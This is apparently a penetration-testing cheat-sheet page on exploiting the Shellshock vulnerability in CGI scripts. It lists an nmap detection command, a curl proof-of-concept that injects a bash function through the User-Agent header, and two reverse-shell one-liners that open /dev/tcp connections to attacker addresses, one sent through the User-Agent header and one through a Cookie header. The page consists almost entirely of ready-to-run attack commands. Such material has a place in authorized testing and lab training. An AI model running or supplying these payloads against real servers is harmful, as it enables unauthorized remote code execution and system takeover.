Skip to content

CGI

shellshock

(step 1) - Testing for shellshock Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.

nmap $(target) -p 80 --script=http-shellshock --script-args uri=/cgi-bin/test.cgi
(step 2) - PoC that we have RCE (you could also make a ping or web request to yourself and monitor that oth tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://11.22.33.44/cgi-bin/test.cgi
(step 3) - Reverse shell
curl -k -H 'User-Agent: () { :; }; /bin/bash -c "exec bash -i &>/dev/tcp/10.10.16.2/4444 <&1"' https://11.22.33.44/test.cgi

other

reflected

curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh